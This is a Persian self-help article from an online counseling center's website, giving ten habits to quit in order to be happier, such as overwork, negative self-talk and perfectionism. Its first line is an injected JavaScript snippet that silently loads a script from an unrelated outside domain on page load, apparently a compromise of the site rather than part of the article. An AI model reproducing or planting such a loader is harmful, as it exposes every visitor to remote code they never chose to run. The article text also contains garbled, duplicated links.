;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); شادی | مرکز مشاوره آنلاین روان‌یاری

شادی

میزان پیشرفت خواندن شما

فهرست مطالب

اگر می خواهید شاد باشید،این ده عادت را ترک کنید!

جامعه شناسان معتقدند ساختار رسمی جامعه باید « شادی » را به عنوان یک حق برای مردم بشناسد،آن را درک کند و در جهت شاد بودن مردم بکوشد.روانشناسان باور دارند اگر می خواهید شاد باشید باید اعتقاد داشته باشید که می توانید و توانایی رسیدن به آن را دارید.

شادی
http://شادیhttp://ravanyari.com/%d8%b4%d8%a7%d8%af%da%a9%d8%a7%d9%85%db%8c/

1. اضافه کاری نکنید.

مطالعات زیادی نشان داده که مدام اضافه کاری کردن می تواند بر سلامت روحی تان اثر منفی بگذارد.اضافه کاری به تندرستی تان هم آسیب می زند چون باعث ابتلا به افسردگی و اضطراب می شود.

2. با خودتان حرف نزنید.

تخمین زده شده که ما هر دقیقه تقریباً 300  تا 1000 کلمه با خودمان حرف می زنیم! و این خودش بهترین نشانه است که ثابت می کند مخرب ترین نیروی جهان برای ما،خودمان هستیم.وقتی مشکلی برایِ مان پیش می آید به راحتی ممکن است در دام گفتگوی منفی درونی بیفتیم.اما گفتگوی منفی درونی می تواند اثرات واقعاً ویرانگری داشته باشد که هم جسم  را تحت تأثیر قرار میدهد و هم روح و روان را.

چیزهایی که به خودمان می گوییم می تواند فرصت شاد بودن را از ما بگیرد.به جای غوطه ور شدن در عادت گفتگوهای غم انگیز با خود،گفتگوی مثبت و انگیزه بخش را با خودتان تمرین کرده و جملات مثبت را پیش خود تکرار کنید.با خودتان با اشتیاق حرف بزنید و بهترین دوست خودتان باشید.

3. سعی نکنید همه چیز را کنترل کنید.

این نوع کنترل می تواند موجب اضطراب و نابسامانی در زندگی شود.شاید قبولش سخت باشد،اما باید هرکس و هرچیزی را همانطوری که در همین لحظه هست بپذیرید تا هم شما شاد باشید و هم هرکسی که در اطراف شماست.

4. دست از سرزنش دیگران بردارید.

سرزنش و نکوهش دیگران،کمکی به شما نمی کند،در عوض سعی کنید این انرژی را برای پیدا کردن نقطه ی ضعف،برطرف کردن آن و یافتن یک راه حل مناسب بگذارید.

5. از آدم های بدبین و منفی باف دوری کنید. بدبینی درست مانند سرماخوردگی،واگیر دارد.

شادی و عوامل شادی
http://شادکامیhttp://ravanyari.com/%d9%87%db%8c%d8%ac%d8%a7%d9%86%d8%a7%d8%aa/

6. ترس از دست دادن را کنار بگذارید.

ریچارد برانسون،کارآفرین مولتی میلیاردر انگلیس می گوید: «فرصت ها مانند اتوبوس ها هستند؛همیشه یکی دیگر در راه است!». پس با احساس ترس ،خودتان را محدود و غمگین و گناهکار نکنید.

7. سعی نکنید روی دیگران تأثیر بگذارید.

روی بهتر شدن در نوع خاص خودتان تمرین کنید تا نقاط قوتِ تان قوی ترشده و نقاط ضعفِ تان کم رنگ تر شده.

8. باور کنید هیچکس به شما بدهکار نیست.

زندگی با این نگرش،قدرتی شگفت انگیز و باور نکردنی به شما می دهد که به راحتی می توانید توقع داشتن از دیگران و طلبکار بودن از آن ها به خاطر شادی دل خودتان کنار بگذارید.

9.سعی نکنید کامل باشید.

تحقیقات نشان داده که کمال گرا بودن می تواند موجب اضطراب های بیشتر در زمینه های اجتماعی بشود و جلوی تجربیات جدید را بگیرید.اگر سعی کنید کامل باشید،نمی توانید روابط بلند مدت با دیگران برقرار کنید.شک و تردید داشتن به خود و یا به عبارتی مطمئن نبودن نسبت به توانایی های خود،احساس بی ارزش بودن را به فرد القا می کند.همین که خوب باشید کافیست.

  چگونه امتحانی موفق داشته باشیم؟

10. دست از زیاده خواهی بردارید.

بعضی از افراد ظاهراً به هیچ اندازه ای قانع نیستند و رویکردشان نسبت به هر چیزی در زندگی،زیاده خواهی است.این افراد معمولاً با حسادت ورزی دست و پنجه نرم می کنند و قدرت بخشش ندارند و از موفقیت دیگران،ناراحت می شوند،طبیعتاً حسود بودن و فداکار نبودن برای شاد نبودن وقعاً کافیست.

شادی
http://شادی

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.